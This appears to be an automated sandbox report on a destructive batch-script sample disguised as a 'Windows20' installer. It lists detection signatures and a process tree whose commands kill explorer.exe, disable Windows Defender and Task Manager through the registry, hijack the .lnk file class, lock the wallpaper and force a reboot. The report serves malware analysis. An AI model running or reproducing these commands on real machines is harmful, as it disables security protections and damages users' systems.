Analysis
- max time kernel: 118s
- max time network: 124s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 02-03-2024 20:29
Behavioral tasks
- behavioral1: TheMalwaredev-s-garbage-main/Install Windows20.exe (resource win7-20240220-en)
- behavioral2: TheMalwaredev-s-garbage-main/Install Windows20.exe (resource win10v2004-20240226-en)
- behavioral3: TheMalwaredev-s-garbage-main/Install Windows20/doom.bat (resource win7-20240221-en)
- behavioral4: TheMalwaredev-s-garbage-main/Install Windows20/doom.bat (resource win10v2004-20240226-en)
- behavioral5: TheMalwaredev-s-garbage-main/Install Windows20/installer.exe (resource win7-20240215-en)
- behavioral6: TheMalwaredev-s-garbage-main/Install Windows20/installer.exe (resource win10v2004-20240226-en)
- behavioral7: TheMalwaredev-s-garbage-main/Install Windows20/installer/1.vbs (resource win7-20240221-en)
- behavioral8: TheMalwaredev-s-garbage-main/Install Windows20/installer/1.vbs (resource win10v2004-20240226-en)
- behavioral9: TheMalwaredev-s-garbage-main/Install Windows20/installer/dead.exe (resource win7-20240221-en)
- behavioral10: TheMalwaredev-s-garbage-main/Install Windows20/installer/dead.exe (resource win10v2004-20240226-en)
- behavioral11: TheMalwaredev-s-garbage-main/Install Windows20/installer/dos.vbs (resource win7-20240221-en)
- behavioral12: TheMalwaredev-s-garbage-main/Install Windows20/installer/dos.vbs (resource win10v2004-20240226-en)
- behavioral13: TheMalwaredev-s-garbage-main/Install Windows20/installer/explorer.hta (resource win7-20240220-en)
- behavioral14: TheMalwaredev-s-garbage-main/Install Windows20/installer/explorer.hta (resource win10v2004-20240226-en)
- behavioral15: TheMalwaredev-s-garbage-main/Install Windows20/installer/explorer.html (resource win7-20240221-en)
- behavioral16: TheMalwaredev-s-garbage-main/Install Windows20/installer/explorer.html (resource win10v2004-20240226-en)
- behavioral17: TheMalwaredev-s-garbage-main/Install Windows20/installer/main.bat (resource win7-20240221-en)
- behavioral18: TheMalwaredev-s-garbage-main/Install Windows20/installer/main.bat (resource win10v2004-20240226-en)
- behavioral19: TheMalwaredev-s-garbage-main/Install Windows20/installer/matrix.bat (resource win7-20240221-en)
- behavioral20: TheMalwaredev-s-garbage-main/Install Windows20/installer/matrix.bat (resource win10v2004-20240226-en)
- behavioral21: TheMalwaredev-s-garbage-main/Install Windows20/installer/melter.exe (resource win7-20240221-en)
- behavioral22: TheMalwaredev-s-garbage-main/Install Windows20/installer/melter.exe (resource win10v2004-20240226-en)
- behavioral23: TheMalwaredev-s-garbage-main/Install Windows20/installer/mover.exe (resource win7-20240220-en)
- behavioral24: TheMalwaredev-s-garbage-main/Install Windows20/installer/mover.exe (resource win10v2004-20240226-en)
- behavioral25: TheMalwaredev-s-garbage-main/Install Windows20/installer/o.vbs (resource win7-20240221-en)
- behavioral26: TheMalwaredev-s-garbage-main/Install Windows20/installer/o.vbs (resource win10v2004-20240226-en)
- behavioral27: TheMalwaredev-s-garbage-main/Install Windows20/installer/op.vbs (resource win7-20240221-en)
- behavioral28: TheMalwaredev-s-garbage-main/Install Windows20/installer/op.vbs (resource win10v2004-20240226-en)
- behavioral29: TheMalwaredev-s-garbage-main/Install Windows20/installer/random.vbs (resource win7-20240221-en)
- behavioral30: TheMalwaredev-s-garbage-main/Install Windows20/installer/random.vbs (resource win10v2004-20240226-en)
- behavioral31: TheMalwaredev-s-garbage-main/Install Windows20/installer/res.exe (resource win7-20240221-en)
- behavioral32: TheMalwaredev-s-garbage-main/Install Windows20/installer/res.exe (resource win10v2004-20240226-en)
General
- Target: TheMalwaredev-s-garbage-main/Install Windows20/installer/main.bat
- Size: 3KB
- MD5: 5f54a2c61397eb3d4f1bc8e9736fec2a
- SHA1: 5c3ad25b0bff96ad74d2743b15089847d6be2d40
- SHA256: 9995fab89f303652abc14b153ea864d9a5e39e20c8077d165e9944948eeeb968
- SHA512: d7c84ac92cb35aca9fb4c2e7bb43924e5033ad49a9b4fcee320386a5d0bfddf2ec674e33a575c0848b9d274bebeb4dc9abca0360493c968bbc29c7a09438141f
Signatures
UAC bypass
Processes: reg.exe (4 instances). All values are under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, written by reg.exe:
- Set value (int) ConsentPromptBehaviorUser = "3"
- Set value (int) EnableLUA = "1"
- Set value (int) ConsentPromptBehaviorUser = "3"
- Set value (int) PromptOnSecureDesktop = "1"
- Set value (int) ConsentPromptBehaviorAdmin = "5"
- Set value (int) PromptOnSecureDesktop = "1"
- Set value (int) ConsentPromptBehaviorUser = "3"
- Set value (int) EnableLUA = "1"
- Set value (int) PromptOnSecureDesktop = "1"
- Set value (int) ConsentPromptBehaviorAdmin = "5"
- Set value (int) ConsentPromptBehaviorUser = "3"
- Set value (int) ConsentPromptBehaviorAdmin = "5"
- Set value (int) EnableLUA = "0"
- Set value (int) ConsentPromptBehaviorAdmin = "5"
- Set value (int) EnableLUA = "0"
- Set value (int) PromptOnSecureDesktop = "1"
Disables Task Manager via registry modification
Matches yara rule upx (UPX-packed executables)
Processes:
- behavioral17/memory/2484-275-0x0000000000400000-0x0000000000410000-memory.dmp
- C:\Users\Public\Desktop\setup3.exe
- behavioral17/memory/2656-338-0x0000000000400000-0x0000000000410000-memory.dmp
- behavioral17/memory/2484-337-0x0000000000400000-0x0000000000410000-memory.dmp
- behavioral17/memory/2732-342-0x0000000000400000-0x0000000000410000-memory.dmp
- behavioral17/memory/2488-341-0x0000000000400000-0x0000000000410000-memory.dmp
- behavioral17/memory/2628-340-0x0000000000400000-0x0000000000410000-memory.dmp
- behavioral17/memory/2572-339-0x0000000000400000-0x0000000000410000-memory.dmp
AutoIT Executable (3 IoCs)
AutoIT scripts compiled to PE executables.
Processes (yara rule autoit_exe):
- behavioral17/memory/2880-176-0x0000000140000000-0x0000000140126000-memory.dmp
- behavioral17/memory/2880-178-0x0000000140000000-0x0000000140126000-memory.dmp
- behavioral17/memory/2880-344-0x0000000140000000-0x0000000140126000-memory.dmp
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes:
- Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Public\\temp\\noescape.bmp" (reg.exe)
Drops file in Windows directory (15 IoCs)
Processes (all by cmd.exe):
- File opened for modification C:\Windows\Web\NO.exe
- File created C:\Windows\winhelper.vbs
- File created C:\Windows\Web\Screen\154.exe
- File opened for modification C:\Windows\SAVEYOURSELF.vbs
- File opened for modification C:\Windows\Web\setup64.exe
- File created C:\Windows\WinKernel32.bat
- File opened for modification C:\Windows\updatepush.exe
- File created C:\Windows\SAVEYOURSELF.vbs
- File created C:\Windows\Web\NO.exe
- File created C:\Windows\Web\setup64.exe
- File opened for modification C:\Windows\WinKernel32.bat
- File created C:\Windows\Web\you cant escape.exe
- File opened for modification C:\Windows\Web\you cant escape.exe
- File created C:\Windows\updatepush.exe
- File opened for modification C:\Windows\winhelper.vbs
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe (1 IoCs)
Processes:
- PID 2472 timeout.exe
Kills process with taskkill (1 IoCs)
Processes:
- PID 1840 taskkill.exe
Modifies registry class (19 IoCs)
Processes (all by reg.exe):
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\Handler = "{ceefea1b-3e29-4ef1-b34c-fec79c4f70af}"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{00021500-0000-0000-C000-000000000046}\ = "{00021401-0000-0000-C000-000000000046}"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\IconPath = "%SystemRoot%\\system32\\shell32.dll,-16769"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\ItemName = "@shell32.dll,-30397"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}\ = "{00021401-0000-0000-C000-000000000046}"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ = "xxx"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{000214EE-0000-0000-C000-000000000046}\ = "{00021401-0000-0000-C000-000000000046}"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{00021500-0000-0000-C000-000000000046}
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\MenuText = "@shell32.dll,-30318"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\Config\DontRename
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{000214EE-0000-0000-C000-000000000046}
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{000214F9-0000-0000-C000-000000000046}
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\NullFile
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellEx\{000214F9-0000-0000-C000-000000000046}\ = "{00021401-0000-0000-C000-000000000046}"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lnk\ShellNew\Config
Modifies registry key (1 TTPs, 2 IoCs)
Suspicious behavior: CmdExeWriteProcessMemorySpam (6 IoCs)
Processes:
- PID 2484 x.exe
- PID 2488 x.exe
- PID 2628 x.exe
- PID 2572 x.exe
- PID 2732 x.exe
- PID 2656 x.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
- Token: SeDebugPrivilege, PID 1840 taskkill.exe
- Token: SeShutdownPrivilege, PID 1796 shutdown.exe
- Token: SeRemoteShutdownPrivilege, PID 1796 shutdown.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
- C:\Windows\system32\cmd.exe (PID 2000)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\main.bat"
  [Drops file in Windows directory; Suspicious use of WriteProcessMemory]
  - C:\Windows\system32\taskkill.exe (PID 1840)
    taskkill /f /im explorer.exe
    [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
  - C:\Windows\System32\WScript.exe (PID 2496)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\update.vbs"
  - C:\Windows\system32\timeout.exe (PID 2472)
    timeout 20
    [Delays execution with timeout.exe]
  - C:\Windows\system32\reg.exe (PID 2248)
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Public\temp\noescape.bmp /f
    [Sets desktop wallpaper using registry]
  - C:\Windows\system32\rundll32.exe (PID 2956)
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
  - C:\Windows\system32\reg.exe (PID 2236)
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  - C:\Windows\system32\reg.exe (PID 1804)
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoTrayItemsDisplay" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 2016)
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
    [Modifies registry key]
  - C:\Windows\system32\reg.exe (PID 1796)
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoPinningToTaskbar" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 2720)
    reg import virus.reg
  - C:\Windows\system32\reg.exe (PID 2780)
    reg import here.reg
    [UAC bypass]
  - C:\Windows\system32\reg.exe (PID 2640)
    reg import death.reg
  - C:\Windows\system32\reg.exe (PID 2804)
    reg import no.reg
    [UAC bypass]
  - C:\Windows\system32\reg.exe (PID 2824)
    reg import password.reg
  - C:\Windows\system32\reg.exe (PID 2820)
    reg import color.reg
  - C:\Windows\System32\WScript.exe (PID 348)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
  - C:\Windows\System32\WScript.exe (PID 1596)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
  - C:\Windows\System32\WScript.exe (PID 588)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
  - C:\Windows\System32\WScript.exe (PID 2304)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
  - C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\mover.exe (PID 2880)
    mover.exe
  - C:\Windows\System32\WScript.exe (PID 2172)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
  - C:\Windows\System32\WScript.exe (PID 2792)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
  - C:\Windows\System32\WScript.exe (PID 2076)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
  - C:\Windows\System32\WScript.exe (PID 2800)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
  - C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe (PID 2484)
    x.exe
    [Suspicious behavior: CmdExeWriteProcessMemorySpam]
    - C:\Windows\SysWOW64\cmd.exe (PID 684)
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6CD.tmp\x.cmd""
  - C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe (PID 2488)
    x.exe
    [Suspicious behavior: CmdExeWriteProcessMemorySpam]
    - C:\Windows\SysWOW64\cmd.exe (PID 2920)
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F68F.tmp\x.cmd""
  - C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe (PID 2628)
    x.exe
    [Suspicious behavior: CmdExeWriteProcessMemorySpam]
    - C:\Windows\SysWOW64\cmd.exe (PID 1040)
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6AE.tmp\x.cmd""
  - C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe (PID 2572)
    x.exe
    [Suspicious behavior: CmdExeWriteProcessMemorySpam]
    - C:\Windows\SysWOW64\cmd.exe (PID 704)
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6AF.tmp\x.cmd""
  - C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe (PID 2732)
    x.exe
    [Suspicious behavior: CmdExeWriteProcessMemorySpam]
    - C:\Windows\SysWOW64\cmd.exe (PID 1936)
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F69E.tmp\x.cmd""
  - C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe (PID 2656)
    x.exe
    [Suspicious behavior: CmdExeWriteProcessMemorySpam]
    - C:\Windows\SysWOW64\cmd.exe (PID 1756)
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6B0.tmp\x.cmd""
  - C:\Windows\system32\reg.exe (PID 3028)
    reg import im.reg
  - C:\Windows\system32\reg.exe (PID 1368)
    reg import systemmessage.reg
    [UAC bypass]
  - C:\Windows\system32\reg.exe (PID 1944)
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    [Modifies registry key]
  - C:\Windows\system32\reg.exe (PID 2008)
    reg import UAC.reg
    [UAC bypass]
  - C:\Windows\system32\reg.exe (PID 2024)
    reg import inkfile.reg
    [Modifies registry class]
  - C:\Windows\system32\shutdown.exe (PID 1796)
    shutdown /r /t 0
    [Suspicious use of AdjustPrivilegeToken]
- C:\Windows\system32\LogonUI.exe (PID 2824)
  "LogonUI.exe" /flags:0x0
- C:\Windows\system32\LogonUI.exe (PID 2296)
  "LogonUI.exe" /flags:0x1